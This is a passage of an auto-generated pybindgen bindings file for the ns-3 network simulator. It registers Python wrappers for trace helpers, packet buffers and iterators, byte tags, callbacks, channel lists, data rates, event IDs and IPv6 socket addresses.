[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('std::string', 'context'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): static void ns3::AsciiTraceHelper::DefaultReceiveSinkWithoutContext(ns3::Ptr<ns3::OutputStreamWrapper> file, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('DefaultReceiveSinkWithoutContext',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'file'), param('ns3::Ptr< ns3::Packet const >', 'p')],
is_static=True)
## trace-helper.h (module 'network'): std::string ns3::AsciiTraceHelper::GetFilenameFromDevice(std::string prefix, ns3::Ptr<ns3::NetDevice> device, bool useObjectNames=true) [member function]
cls.add_method('GetFilenameFromDevice',
'std::string',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'useObjectNames', default_value='true')])
## trace-helper.h (module 'network'): std::string ns3::AsciiTraceHelper::GetFilenameFromInterfacePair(std::string prefix, ns3::Ptr<ns3::Object> object, uint32_t interface, bool useObjectNames=true) [member function]
cls.add_method('GetFilenameFromInterfacePair',
'std::string',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::Object >', 'object'), param('uint32_t', 'interface'), param('bool', 'useObjectNames', default_value='true')])
return
def register_Ns3AsciiTraceHelperForDevice_methods(root_module, cls):
## trace-helper.h (module 'network'): ns3::AsciiTraceHelperForDevice::AsciiTraceHelperForDevice(ns3::AsciiTraceHelperForDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AsciiTraceHelperForDevice const &', 'arg0')])
## trace-helper.h (module 'network'): ns3::AsciiTraceHelperForDevice::AsciiTraceHelperForDevice() [constructor]
cls.add_constructor([])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(std::string prefix, ns3::Ptr<ns3::NetDevice> nd, bool explicitFilename=false) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'nd'), param('bool', 'explicitFilename', default_value='false')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Ptr<ns3::NetDevice> nd) [member function]
cls.add_method('EnableAscii',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Ptr< ns3::NetDevice >', 'nd')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(std::string prefix, std::string ndName, bool explicitFilename=false) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::string', 'prefix'), param('std::string', 'ndName'), param('bool', 'explicitFilename', default_value='false')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(ns3::Ptr<ns3::OutputStreamWrapper> stream, std::string ndName) [member function]
cls.add_method('EnableAscii',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('std::string', 'ndName')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(std::string prefix, ns3::NetDeviceContainer d) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::string', 'prefix'), param('ns3::NetDeviceContainer', 'd')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::NetDeviceContainer d) [member function]
cls.add_method('EnableAscii',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::NetDeviceContainer', 'd')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(std::string prefix, ns3::NodeContainer n) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::string', 'prefix'), param('ns3::NodeContainer', 'n')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::NodeContainer n) [member function]
cls.add_method('EnableAscii',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::NodeContainer', 'n')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(std::string prefix, uint32_t nodeid, uint32_t deviceid, bool explicitFilename) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::string', 'prefix'), param('uint32_t', 'nodeid'), param('uint32_t', 'deviceid'), param('bool', 'explicitFilename')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAscii(ns3::Ptr<ns3::OutputStreamWrapper> stream, uint32_t nodeid, uint32_t deviceid) [member function]
cls.add_method('EnableAscii',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('uint32_t', 'nodeid'), param('uint32_t', 'deviceid')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAsciiAll(std::string prefix) [member function]
cls.add_method('EnableAsciiAll',
'void',
[param('std::string', 'prefix')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAsciiAll(ns3::Ptr<ns3::OutputStreamWrapper> stream) [member function]
cls.add_method('EnableAsciiAll',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')])
## trace-helper.h (module 'network'): void ns3::AsciiTraceHelperForDevice::EnableAsciiInternal(ns3::Ptr<ns3::OutputStreamWrapper> stream, std::string prefix, ns3::Ptr<ns3::NetDevice> nd, bool explicitFilename) [member function]
cls.add_method('EnableAsciiInternal',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'nd'), param('bool', 'explicitFilename')],
is_pure_virtual=True, is_virtual=True)
return
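# EnableAsciiInternal is registered with is_pure_virtual=True, is_virtual=True,
# so the generated wrapper should treat ns3::AsciiTraceHelperForDevice as an
# abstract base: concrete device helpers (in C++ or in Python subclasses) are
# expected to provide this hook, mirroring the pure virtual in trace-helper.h.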
def register_Ns3AttributeConstructionList_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('Find',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True)
return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
return
def register_Ns3Buffer_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Buffer() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize, bool initialize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize'), param('bool', 'initialize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(ns3::Buffer const & o) [copy constructor]
cls.add_constructor([param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtEnd(uint32_t end) [member function]
cls.add_method('AddAtEnd',
'bool',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(ns3::Buffer const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtStart(uint32_t start) [member function]
cls.add_method('AddAtStart',
'bool',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::Begin() const [member function]
cls.add_method('Begin',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Buffer',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFullCopy() const [member function]
cls.add_method('CreateFullCopy',
'ns3::Buffer',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::End() const [member function]
cls.add_method('End',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentEndOffset() const [member function]
cls.add_method('GetCurrentEndOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentStartOffset() const [member function]
cls.add_method('GetCurrentStartOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint8_t const * ns3::Buffer::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3BufferIterator_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator(ns3::Buffer::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Buffer::Iterator const &', 'arg0')])
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size, uint32_t initialChecksum) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size'), param('uint32_t', 'initialChecksum')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetDistanceFrom(ns3::Buffer::Iterator const & o) const [member function]
cls.add_method('GetDistanceFrom',
'uint32_t',
[param('ns3::Buffer::Iterator const &', 'o')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsEnd() const [member function]
cls.add_method('IsEnd',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsStart() const [member function]
cls.add_method('IsStart',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next() [member function]
cls.add_method('Next',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next(uint32_t delta) [member function]
cls.add_method('Next',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev() [member function]
cls.add_method('Prev',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev(uint32_t delta) [member function]
cls.add_method('Prev',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadLsbtohU16() [member function]
cls.add_method('ReadLsbtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadLsbtohU32() [member function]
cls.add_method('ReadLsbtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadLsbtohU64() [member function]
cls.add_method('ReadLsbtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadNtohU16() [member function]
cls.add_method('ReadNtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadNtohU32() [member function]
cls.add_method('ReadNtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadNtohU64() [member function]
cls.add_method('ReadNtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(ns3::Buffer::Iterator start, ns3::Buffer::Iterator end) [member function]
cls.add_method('Write',
'void',
[param('ns3::Buffer::Iterator', 'start'), param('ns3::Buffer::Iterator', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU16(uint16_t data) [member function]
cls.add_method('WriteHtolsbU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU32(uint32_t data) [member function]
cls.add_method('WriteHtolsbU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU64(uint64_t data) [member function]
cls.add_method('WriteHtolsbU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU16(uint16_t data) [member function]
cls.add_method('WriteHtonU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU32(uint32_t data) [member function]
cls.add_method('WriteHtonU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU64(uint64_t data) [member function]
cls.add_method('WriteHtonU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU64(uint64_t data) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data, uint32_t len) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data'), param('uint32_t', 'len')])
return
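# The Read*/Write* pairs registered above mirror ns3::Buffer::Iterator's
# byte-order helpers: ReadNtohU16/WriteHtonU16 (and their U32/U64 variants)
# convert between host and network (big-endian) order, ReadLsbtohU16/
# WriteHtolsbU16 convert between host and little-endian order, and the plain
# ReadU16/WriteU16 forms use the host's native, non-portable byte layout.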
def register_Ns3ByteTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::ByteTagIterator(ns3::ByteTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::ByteTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator::Item ns3::ByteTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagIterator::Item',
[])
return
def register_Ns3ByteTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::Item::Item(ns3::ByteTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetEnd() const [member function]
cls.add_method('GetEnd',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetStart() const [member function]
cls.add_method('GetStart',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): void ns3::ByteTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::ByteTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3ByteTagList_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList() [constructor]
cls.add_constructor([])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList(ns3::ByteTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): ns3::TagBuffer ns3::ByteTagList::Add(ns3::TypeId tid, uint32_t bufferSize, int32_t start, int32_t end) [member function]
cls.add_method('Add',
'ns3::TagBuffer',
[param('ns3::TypeId', 'tid'), param('uint32_t', 'bufferSize'), param('int32_t', 'start'), param('int32_t', 'end')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Add(ns3::ByteTagList const & o) [member function]
cls.add_method('Add',
'void',
[param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtEnd(int32_t adjustment, int32_t appendOffset) [member function]
cls.add_method('AddAtEnd',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'appendOffset')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtStart(int32_t adjustment, int32_t prependOffset) [member function]
cls.add_method('AddAtStart',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'prependOffset')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator ns3::ByteTagList::Begin(int32_t offsetStart, int32_t offsetEnd) const [member function]
cls.add_method('Begin',
'ns3::ByteTagList::Iterator',
[param('int32_t', 'offsetStart'), param('int32_t', 'offsetEnd')],
is_const=True)
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3ByteTagListIterator_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Iterator(ns3::ByteTagList::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator const &', 'arg0')])
## byte-tag-list.h (module 'network'): uint32_t ns3::ByteTagList::Iterator::GetOffsetStart() const [member function]
cls.add_method('GetOffsetStart',
'uint32_t',
[],
is_const=True)
## byte-tag-list.h (module 'network'): bool ns3::ByteTagList::Iterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item ns3::ByteTagList::Iterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagList::Iterator::Item',
[])
return
def register_Ns3ByteTagListIteratorItem_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::ByteTagList::Iterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator::Item const &', 'arg0')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::TagBuffer buf) [constructor]
cls.add_constructor([param('ns3::TagBuffer', 'buf')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::buf [variable]
cls.add_instance_attribute('buf', 'ns3::TagBuffer', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::end [variable]
cls.add_instance_attribute('end', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::size [variable]
cls.add_instance_attribute('size', 'uint32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::start [variable]
cls.add_instance_attribute('start', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3ChannelList_methods(root_module, cls):
## channel-list.h (module 'network'): ns3::ChannelList::ChannelList() [constructor]
cls.add_constructor([])
## channel-list.h (module 'network'): ns3::ChannelList::ChannelList(ns3::ChannelList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ChannelList const &', 'arg0')])
## channel-list.h (module 'network'): static uint32_t ns3::ChannelList::Add(ns3::Ptr<ns3::Channel> channel) [member function]
cls.add_method('Add',
'uint32_t',
[param('ns3::Ptr< ns3::Channel >', 'channel')],
is_static=True)
## channel-list.h (module 'network'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Channel>*,std::vector<ns3::Ptr<ns3::Channel>, std::allocator<ns3::Ptr<ns3::Channel> > > > ns3::ChannelList::Begin() [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Channel > const, std::vector< ns3::Ptr< ns3::Channel > > >',
[],
is_static=True)
## channel-list.h (module 'network'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Channel>*,std::vector<ns3::Ptr<ns3::Channel>, std::allocator<ns3::Ptr<ns3::Channel> > > > ns3::ChannelList::End() [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Channel > const, std::vector< ns3::Ptr< ns3::Channel > > >',
[],
is_static=True)
## channel-list.h (module 'network'): static ns3::Ptr<ns3::Channel> ns3::ChannelList::GetChannel(uint32_t n) [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[param('uint32_t', 'n')],
is_static=True)
## channel-list.h (module 'network'): static uint32_t ns3::ChannelList::GetNChannels() [member function]
cls.add_method('GetNChannels',
'uint32_t',
[],
is_static=True)
return
def register_Ns3DataRate_methods(root_module, cls):
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('!=')
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('>=')
## data-rate.h (module 'network'): ns3::DataRate::DataRate(ns3::DataRate const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DataRate const &', 'arg0')])
## data-rate.h (module 'network'): ns3::DataRate::DataRate() [constructor]
cls.add_constructor([])
## data-rate.h (module 'network'): ns3::DataRate::DataRate(uint64_t bps) [constructor]
cls.add_constructor([param('uint64_t', 'bps')])
## data-rate.h (module 'network'): ns3::DataRate::DataRate(std::string rate) [constructor]
cls.add_constructor([param('std::string', 'rate')])
## data-rate.h (module 'network'): double ns3::DataRate::CalculateTxTime(uint32_t bytes) const [member function]
cls.add_method('CalculateTxTime',
'double',
[param('uint32_t', 'bytes')],
is_const=True)
## data-rate.h (module 'network'): uint64_t ns3::DataRate::GetBitRate() const [member function]
cls.add_method('GetBitRate',
'uint64_t',
[],
is_const=True)
return
def register_Ns3EventId_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_binary_comparison_operator('==')
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::EventId const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventId const &', 'arg0')])
## event-id.h (module 'core'): ns3::EventId::EventId() [constructor]
cls.add_constructor([])
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::Ptr<ns3::EventImpl> const & impl, uint64_t ts, uint32_t context, uint32_t uid) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::EventImpl > const &', 'impl'), param('uint64_t', 'ts'), param('uint32_t', 'context'), param('uint32_t', 'uid')])
## event-id.h (module 'core'): void ns3::EventId::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-id.h (module 'core'): uint32_t ns3::EventId::GetContext() const [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): uint64_t ns3::EventId::GetTs() const [member function]
cls.add_method('GetTs',
'uint64_t',
[],
is_const=True)
## event-id.h (module 'core'): uint32_t ns3::EventId::GetUid() const [member function]
cls.add_method('GetUid',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsExpired() const [member function]
cls.add_method('IsExpired',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsRunning() const [member function]
cls.add_method('IsRunning',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): ns3::EventImpl * ns3::EventId::PeekEventImpl() const [member function]
cls.add_method('PeekEventImpl',
'ns3::EventImpl *',
[],
is_const=True)
return
def register_Ns3Inet6SocketAddress_methods(root_module, cls):
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Inet6SocketAddress const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Inet6SocketAddress const &', 'arg0')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6, uint16_t port) [constructor]
cls.add_constructor([param('ns3::Ipv6Address', 'ipv6'), param('uint16_t', 'port')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6) [constructor]
cls.add_constructor([param('ns3::Ipv6Address', 'ipv6')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(uint16_t port) [constructor]
cls.add_constructor([param('uint16_t', 'port')])
